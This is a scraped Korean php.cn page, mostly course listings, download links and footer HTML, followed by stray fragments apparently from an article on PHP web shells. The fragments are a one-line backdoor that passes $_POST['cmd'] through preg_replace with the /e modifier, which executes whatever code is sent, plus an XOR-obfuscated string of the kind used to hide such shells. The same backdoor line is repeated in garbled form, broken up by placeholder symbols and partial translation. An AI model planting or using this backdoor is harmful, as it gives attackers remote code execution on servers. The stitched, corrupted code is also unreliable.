기반 소개 비디오 튜토리얼</a> <div class="wzrthreerb"> <div>505736 <b class="kclbcollectb"></b></div> <div class="courseICollection" data-id="504"> <b class="nofollow small-nocollect"></b> </div> </div> </div> </li> <li> <a target="_blank" href="https://www.php.cn/ko/course/2.html" title="PHP 제로 기반 입문 튜토리얼" class="wzrthreelaimg"> <img src="https://img.php.cn/upload/course/000/000/068/6253de27bc161468.png" alt="PHP 제로 기반 입문 튜토리얼"/> </a> <div class="wzrthree-right"> <a target="_blank" title="PHP 제로 기반 입문 튜토리얼" href="https://www.php.cn/ko/course/2.html">PHP 제로 기반 입문 튜토리얼</a> <div class="wzrthreerb"> <div>860834 <b class="kclbcollectb"></b></div> <div class="courseICollection" data-id="2"> <b class="nofollow small-nocollect"></b> </div> </div> </div> </li> </ul> <ul class="two" style="display: none;"> <li> <a target="_blank" href="https://www.php.cn/ko/course/812.html" title="최신 ThinkPHP 5.1 세계 최초 비디오 튜토리얼(PHP 전문가 온라인 교육 과정이 되기까지 60일)" class="wzrthreelaimg"> <img src="https://img.php.cn/upload/course/000/000/041/620debc3eab3f377.jpg" alt="최신 ThinkPHP 5.1 세계 최초 비디오 튜토리얼(PHP 전문가 온라인 교육 과정이 되기까지 60일)"/> </a> <div class="wzrthree-right"> <a target="_blank" title="최신 ThinkPHP 5.1 세계 최초 비디오 튜토리얼(PHP 전문가 온라인 교육 과정이 되기까지 60일)" href="https://www.php.cn/ko/course/812.html">최신 ThinkPHP 5.1 세계 최초 비디오 튜토리얼(PHP 전문가 온라인 교육 과정이 되기까지 60일)</a> <div class="wzrthreerb"> <div >1420568 학습 시간</div> <div class="courseICollection" data-id="812"> <b class="nofollow small-nocollect"></b> </div> </div> </div> </li> <li> <a target="_blank" href="https://www.php.cn/ko/course/286.html" title="JAVA 초보자용 비디오 튜토리얼" class="wzrthreelaimg"> <img src="https://img.php.cn/upload/course/000/000/068/62590a2bacfd9379.png" alt="JAVA 초보자용 비디오 튜토리얼"/> </a> <div class="wzrthree-right"> <a target="_blank" title="JAVA 초보자용 비디오 튜토리얼" href="https://www.php.cn/ko/course/286.html">JAVA 초보자용 비디오 튜토리얼</a> <div class="wzrthreerb"> <div >2509499 학습 시간</div> <div class="courseICollection" data-id="286"> <b class="nofollow small-nocollect"></b> </div> </div> </div> </li> <li> <a target="_blank" href="https://www.php.cn/ko/course/504.html" title="Little Turtle의 Python 학습에 대한 제로 기반 소개 비디오 튜토리얼" class="wzrthreelaimg"> <img src="https://img.php.cn/upload/course/000/000/068/62590a67ce3a6655.png" alt="Little Turtle의 Python 학습에 대한 제로 기반 소개 비디오 튜토리얼"/> </a> <div class="wzrthree-right"> <a target="_blank" title="Little Turtle의 Python 학습에 대한 제로 기반 소개 비디오 튜토리얼" href="https://www.php.cn/ko/course/504.html">Little Turtle의 Python 학습에 대한 제로 기반 소개 비디오 튜토리얼</a> <div class="wzrthreerb"> <div >505736 학습 시간</div> <div class="courseICollection" data-id="504"> <b class="nofollow small-nocollect"></b> </div> </div> </div> </li> <li> <a target="_blank" href="https://www.php.cn/ko/course/901.html" title="웹 프론트 엔드 개발에 대한 빠른 소개" class="wzrthreelaimg"> <img src="https://img.php.cn/upload/course/000/000/067/64be28a53a4f6310.png" alt="웹 프론트 엔드 개발에 대한 빠른 소개"/> </a> <div class="wzrthree-right"> <a target="_blank" title="웹 프론트 엔드 개발에 대한 빠른 소개" href="https://www.php.cn/ko/course/901.html">웹 프론트 엔드 개발에 대한 빠른 소개</a> <div class="wzrthreerb"> <div >215572 학습 시간</div> <div class="courseICollection" data-id="901"> <b class="nofollow small-nocollect"></b> </div> </div> </div> </li> <li> <a target="_blank" href="https://www.php.cn/ko/course/234.html" title="PS 비디오 튜토리얼을 처음부터 마스터하세요" class="wzrthreelaimg"> <img src="https://img.php.cn/upload/course/000/000/068/62611f57ed0d4840.jpg" alt="PS 비디오 튜토리얼을 처음부터 마스터하세요"/> </a> <div class="wzrthree-right"> <a target="_blank" title="PS 비디오 튜토리얼을 처음부터 마스터하세요" href="https://www.php.cn/ko/course/234.html">PS 비디오 튜토리얼을 처음부터 마스터하세요</a> <div class="wzrthreerb"> <div >885037 학습 시간</div> <div class="courseICollection" data-id="234"> <b class="nofollow small-nocollect"></b> </div> </div> </div> </li> </ul> <ul class="three" style="display: none;"> <li> <a target="_blank" href="https://www.php.cn/ko/course/1648.html" title="[웹 프런트엔드] Node.js 빠른 시작" class="wzrthreelaimg"> <img src="https://img.php.cn/upload/course/000/000/067/662b5d34ba7c0227.png" alt="[웹 프런트엔드] Node.js 빠른 시작"/> </a> <div class="wzrthree-right"> <a target="_blank" title="[웹 프런트엔드] Node.js 빠른 시작" href="https://www.php.cn/ko/course/1648.html">[웹 프런트엔드] Node.js 빠른 시작</a> <div class="wzrthreerb"> <div >7093 학습 시간</div> <div class="courseICollection" data-id="1648"> <b class="nofollow small-nocollect"></b> </div> </div> </div> </li> <li> <a target="_blank" href="https://www.php.cn/ko/course/1647.html" title="해외 웹 개발 풀스택 강좌 총집합" class="wzrthreelaimg"> <img src="https://img.php.cn/upload/course/000/000/067/6628cc96e310c937.png" alt="해외 웹 개발 풀스택 강좌 총집합"/> </a> <div class="wzrthree-right"> <a target="_blank" title="해외 웹 개발 풀스택 강좌 총집합" href="https://www.php.cn/ko/course/1647.html">해외 웹 개발 풀스택 강좌 총집합</a> <div class="wzrthreerb"> <div >5509 학습 시간</div> <div class="courseICollection" data-id="1647"> <b class="nofollow small-nocollect"></b> </div> </div> </div> </li> <li> <a target="_blank" href="https://www.php.cn/ko/course/1646.html" title="Go 언어 실습 GraphQL" class="wzrthreelaimg"> <img src="https://img.php.cn/upload/course/000/000/067/662221173504a436.png" alt="Go 언어 실습 GraphQL"/> </a> <div class="wzrthree-right"> <a target="_blank" title="Go 언어 실습 GraphQL" href="https://www.php.cn/ko/course/1646.html">Go 언어 실습 GraphQL</a> <div class="wzrthreerb"> <div >4645 학습 시간</div> <div class="courseICollection" data-id="1646"> <b class="nofollow small-nocollect"></b> </div> </div> </div> </li> <li> <a target="_blank" href="https://www.php.cn/ko/course/1645.html" title="550W 팬 마스터가 JavaScript를 처음부터 차근차근 학습합니다" class="wzrthreelaimg"> <img src="https://img.php.cn/upload/course/000/000/067/662077e163124646.png" alt="550W 팬 마스터가 JavaScript를 처음부터 차근차근 학습합니다"/> </a> <div class="wzrthree-right"> <a target="_blank" title="550W 팬 마스터가 JavaScript를 처음부터 차근차근 학습합니다" href="https://www.php.cn/ko/course/1645.html">550W 팬 마스터가 JavaScript를 처음부터 차근차근 학습합니다</a> <div class="wzrthreerb"> <div >667 학습 시간</div> <div class="courseICollection" data-id="1645"> <b class="nofollow small-nocollect"></b> </div> </div> </div> </li> <li> <a target="_blank" href="https://www.php.cn/ko/course/1644.html" title="기초 지식이 전혀 없는 초보자도 6시간 만에 시작할 수 있는 파이썬 마스터 모쉬" class="wzrthreelaimg"> <img src="https://img.php.cn/upload/course/000/000/067/6616418ca80b8916.png" alt="기초 지식이 전혀 없는 초보자도 6시간 만에 시작할 수 있는 파이썬 마스터 모쉬"/> </a> <div class="wzrthree-right"> <a target="_blank" title="기초 지식이 전혀 없는 초보자도 6시간 만에 시작할 수 있는 파이썬 마스터 모쉬" href="https://www.php.cn/ko/course/1644.html">기초 지식이 전혀 없는 초보자도 6시간 만에 시작할 수 있는 파이썬 마스터 모쉬</a> <div class="wzrthreerb"> <div >23467 학습 시간</div> <div class="courseICollection" data-id="1644"> <b class="nofollow small-nocollect"></b> </div> </div> </div> </li> </ul> </div> <script> var mySwiper = new Swiper('.swiper2', { autoplay: false,//可选选项,自动滑动 slidesPerView : 'auto', }) $('.wzrthreeTab>div').click(function(e){ $('.wzrthreeTab>div').removeClass('check') $(this).addClass('check') $('.wzrthreelist>ul').css('display','none') $('.'+e.currentTarget.dataset.id).show() }) </script> </div> <div class="wzrFour"> <div class="wzrfour-title"> <div>최신 다운로드</div> <a href="https://www.php.cn/ko/xiazai">더> </a> </div> <script> $(document).ready(function(){ var sjyx_banSwiper = new Swiper(".sjyx_banSwiperwz",{ speed:1000, autoplay:{ delay:3500, disableOnInteraction: false, }, pagination:{ el:'.sjyx_banSwiperwz .swiper-pagination', clickable :false, }, loop:true }) }) </script> <div class="wzrfourList swiper3"> <div class="wzrfourlTab swiper-wrapper"> <div class="check swiper-slide" data-id="onef">웹 효과 <div></div></div> <div class="swiper-slide" data-id="twof">웹사이트 소스 코드<div></div></div> <div class="swiper-slide" data-id="threef">웹사이트 자료<div></div></div> <div class="swiper-slide" data-id="fourf">프론트엔드 템플릿<div></div></div> </div> <ul class="onef"> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a target="_blank" title="jQuery 기업 메시지 양식 연락처 코드" href="https://www.php.cn/ko/toolset/js-special-effects/8071">[양식 버튼] jQuery 기업 메시지 양식 연락처 코드</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a target="_blank" title="HTML5 MP3 뮤직 박스 재생 효과" href="https://www.php.cn/ko/toolset/js-special-effects/8070">[플레이어 특수 효과] HTML5 MP3 뮤직 박스 재생 효과</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a target="_blank" title="HTML5 멋진 입자 애니메이션 탐색 메뉴 특수 효과" href="https://www.php.cn/ko/toolset/js-special-effects/8069">[메뉴 탐색] HTML5 멋진 입자 애니메이션 탐색 메뉴 특수 효과</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a target="_blank" title="jQuery 시각적 양식 드래그 앤 드롭 편집 코드" href="https://www.php.cn/ko/toolset/js-special-effects/8068">[양식 버튼] jQuery 시각적 양식 드래그 앤 드롭 편집 코드</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a target="_blank" title="VUE.JS 모방 Kugou 음악 플레이어 코드" href="https://www.php.cn/ko/toolset/js-special-effects/8067">[플레이어 특수 효과] VUE.JS 모방 Kugou 음악 플레이어 코드</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a target="_blank" title="클래식 HTML5 푸시 박스 게임" href="https://www.php.cn/ko/toolset/js-special-effects/8066">[HTML5 특수 효과] 클래식 HTML5 푸시 박스 게임</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a target="_blank" title="이미지 효과를 추가하거나 줄이기 위해 jQuery 스크롤" href="https://www.php.cn/ko/toolset/js-special-effects/8065">[그림 특수 효과] 이미지 효과를 추가하거나 줄이기 위해 jQuery 스크롤</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a target="_blank" title="CSS3 개인 앨범 커버 호버 확대/축소 효과" href="https://www.php.cn/ko/toolset/js-special-effects/8064">[사진 앨범 효과] CSS3 개인 앨범 커버 호버 확대/축소 효과</a> </div> </li> </ul> <ul class="twof" style="display:none"> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a href="https://www.php.cn/ko/toolset/website-source-code/8328" title="가정 장식 청소 및 수리 서비스 회사 웹사이트 템플릿" target="_blank">[프런트엔드 템플릿] 가정 장식 청소 및 수리 서비스 회사 웹사이트 템플릿</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a href="https://www.php.cn/ko/toolset/website-source-code/8327" title="신선한 색상의 개인 이력서 가이드 페이지 템플릿" target="_blank">[프런트엔드 템플릿] 신선한 색상의 개인 이력서 가이드 페이지 템플릿</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a href="https://www.php.cn/ko/toolset/website-source-code/8326" title="디자이너 크리에이티브 작업 이력서 웹 템플릿" target="_blank">[프런트엔드 템플릿] 디자이너 크리에이티브 작업 이력서 웹 템플릿</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a href="https://www.php.cn/ko/toolset/website-source-code/8325" title="현대 엔지니어링 건설 회사 웹사이트 템플릿" target="_blank">[프런트엔드 템플릿] 현대 엔지니어링 건설 회사 웹사이트 템플릿</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a href="https://www.php.cn/ko/toolset/website-source-code/8324" title="교육 서비스 기관을 위한 반응형 HTML5 템플릿" target="_blank">[프런트엔드 템플릿] 교육 서비스 기관을 위한 반응형 HTML5 템플릿</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a href="https://www.php.cn/ko/toolset/website-source-code/8323" title="온라인 전자책 쇼핑몰 웹사이트 템플릿" target="_blank">[프런트엔드 템플릿] 온라인 전자책 쇼핑몰 웹사이트 템플릿</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a href="https://www.php.cn/ko/toolset/website-source-code/8322" title="IT 기술로 인터넷 회사 웹 사이트 템플릿을 해결합니다." target="_blank">[프런트엔드 템플릿] IT 기술로 인터넷 회사 웹 사이트 템플릿을 해결합니다.</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a href="https://www.php.cn/ko/toolset/website-source-code/8321" title="보라색 스타일 외환 거래 서비스 웹 사이트 템플릿" target="_blank">[프런트엔드 템플릿] 보라색 스타일 외환 거래 서비스 웹 사이트 템플릿</a> </div> </li> </ul> <ul class="threef" style="display:none"> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a href="https://www.php.cn/ko/toolset/website-materials/3078" target="_blank" title="귀여운 여름 요소 벡터 자료(EPS+PNG)">[PNG 소재] 귀여운 여름 요소 벡터 자료(EPS+PNG)</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a href="https://www.php.cn/ko/toolset/website-materials/3077" target="_blank" title="4개의 빨간색 2023 졸업 배지 벡터 자료(AI+EPS+PNG)">[PNG 소재] 4개의 빨간색 2023 졸업 배지 벡터 자료(AI+EPS+PNG)</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a href="https://www.php.cn/ko/toolset/website-materials/3076" target="_blank" title="노래하는 새와 꽃 디자인 봄 배너 벡터 자료로 가득 찬 카트(AI+EPS)">[배너 그림] 노래하는 새와 꽃 디자인 봄 배너 벡터 자료로 가득 찬 카트(AI+EPS)</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a href="https://www.php.cn/ko/toolset/website-materials/3075" target="_blank" title="황금 졸업 모자 벡터 자료(EPS+PNG)">[PNG 소재] 황금 졸업 모자 벡터 자료(EPS+PNG)</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a href="https://www.php.cn/ko/toolset/website-materials/3074" target="_blank" title="흑백 스타일 산 아이콘 벡터 자료(EPS+PNG)">[PNG 소재] 흑백 스타일 산 아이콘 벡터 자료(EPS+PNG)</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a href="https://www.php.cn/ko/toolset/website-materials/3073" target="_blank" title="다양한 색상의 망토와 포즈를 갖춘 슈퍼히어로 실루엣 벡터 자료(EPS+PNG)">[PNG 소재] 다양한 색상의 망토와 포즈를 갖춘 슈퍼히어로 실루엣 벡터 자료(EPS+PNG)</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a href="https://www.php.cn/ko/toolset/website-materials/3072" target="_blank" title="플랫 스타일 식목일 배너 벡터 자료(AI+EPS)">[배너 그림] 플랫 스타일 식목일 배너 벡터 자료(AI+EPS)</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a href="https://www.php.cn/ko/toolset/website-materials/3071" target="_blank" title="9개의 만화 스타일의 폭발적인 채팅 거품 벡터 자료(EPS+PNG)">[PNG 소재] 9개의 만화 스타일의 폭발적인 채팅 거품 벡터 자료(EPS+PNG)</a> </div> </li> </ul> <ul class="fourf" style="display:none"> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a href="https://www.php.cn/ko/toolset/website-source-code/8328" target="_blank" title="가정 장식 청소 및 수리 서비스 회사 웹사이트 템플릿">[프런트엔드 템플릿] 가정 장식 청소 및 수리 서비스 회사 웹사이트 템플릿</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a href="https://www.php.cn/ko/toolset/website-source-code/8327" target="_blank" title="신선한 색상의 개인 이력서 가이드 페이지 템플릿">[프런트엔드 템플릿] 신선한 색상의 개인 이력서 가이드 페이지 템플릿</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a href="https://www.php.cn/ko/toolset/website-source-code/8326" target="_blank" title="디자이너 크리에이티브 작업 이력서 웹 템플릿">[프런트엔드 템플릿] 디자이너 크리에이티브 작업 이력서 웹 템플릿</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a href="https://www.php.cn/ko/toolset/website-source-code/8325" target="_blank" title="현대 엔지니어링 건설 회사 웹사이트 템플릿">[프런트엔드 템플릿] 현대 엔지니어링 건설 회사 웹사이트 템플릿</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a href="https://www.php.cn/ko/toolset/website-source-code/8324" target="_blank" title="교육 서비스 기관을 위한 반응형 HTML5 템플릿">[프런트엔드 템플릿] 교육 서비스 기관을 위한 반응형 HTML5 템플릿</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a href="https://www.php.cn/ko/toolset/website-source-code/8323" target="_blank" title="온라인 전자책 쇼핑몰 웹사이트 템플릿">[프런트엔드 템플릿] 온라인 전자책 쇼핑몰 웹사이트 템플릿</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a href="https://www.php.cn/ko/toolset/website-source-code/8322" target="_blank" title="IT 기술로 인터넷 회사 웹 사이트 템플릿을 해결합니다.">[프런트엔드 템플릿] IT 기술로 인터넷 회사 웹 사이트 템플릿을 해결합니다.</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a href="https://www.php.cn/ko/toolset/website-source-code/8321" target="_blank" title="보라색 스타일 외환 거래 서비스 웹 사이트 템플릿">[프런트엔드 템플릿] 보라색 스타일 외환 거래 서비스 웹 사이트 템플릿</a> </div> </li> </ul> </div> <script> var mySwiper = new Swiper('.swiper3', { autoplay: false,//可选选项,自动滑动 slidesPerView : 'auto', }) $('.wzrfourlTab>div').click(function(e){ $('.wzrfourlTab>div').removeClass('check') $(this).addClass('check') $('.wzrfourList>ul').css('display','none') $('.'+e.currentTarget.dataset.id).show() }) </script> </div> </div> </div> <footer> <div class="footer"> <div class="footertop"> <img src="/static/imghw/logo.png" alt=""> <p>공공복지 온라인 PHP 교육,PHP 학습자의 빠른 성장을 도와주세요!</p> </div> <div class="footermid"> <a href="https://www.php.cn/ko/about/us.html">회사 소개</a> <a href="https://www.php.cn/ko/about/disclaimer.html">부인 성명</a> <a href="https://www.php.cn/ko/update/article_0_1.html">Sitemap</a> </div> <div class="footerbottom"> <p> © php.cn All rights reserved </p> </div> </div> </footer> <input type="hidden" id="verifycode" value="/captcha.html"> <script>layui.use(['element', 'carousel'], function () {var element = layui.element;$ = layui.jquery;var carousel = layui.carousel;carousel.render({elem: '#test1', width: '100%', height: '330px', arrow: 'always'});$.getScript('/static/js/jquery.lazyload.min.js', function () {$("img").lazyload({placeholder: "/static/images/load.jpg", effect: "fadeIn", threshold: 200, skip_invisible: false});});});</script> <script src="/static/js/common_new.js"></script> <script type="text/javascript" src="/static/js/jquery.cookie.js?1732491890"></script> <script src="https://vdse.bdstatic.com//search-video.v1.min.js"></script> <link rel='stylesheet' id='_main-css' href='/static/css/viewer.min.css?2' type='text/css' media='all'/> <script type='text/javascript' src='/static/js/viewer.min.js?1'></script> <script type='text/javascript' src='/static/js/jquery-viewer.min.js'></script> <script type="text/javascript" src="/static/js/global.min.js?5.5.53"></script> </body> </html>

1

2

3

4

functionfunfunc($str){}

echopreg_replace("/(.+?)/ies",'funfunc("1")',$_POST["cmd"]);

?>

1
$__ =("#"^"|").("."^" ~").("/"^"`"). ("|"^"/").("{"^"/")
1
2
3
4
<🎜><🎜><🎜>기능<🎜><🎜>funfun< 🎜>(<🎜>$str<🎜>)<🎜>{<🎜>}<🎜><🎜><🎜><🎜><🎜><🎜><🎜><🎜><🎜><🎜> <🎜>echopreg_replace<🎜>(<🎜>"/(.+?)/ies",'funfunc("1")',$_POST["cmd"]); ?>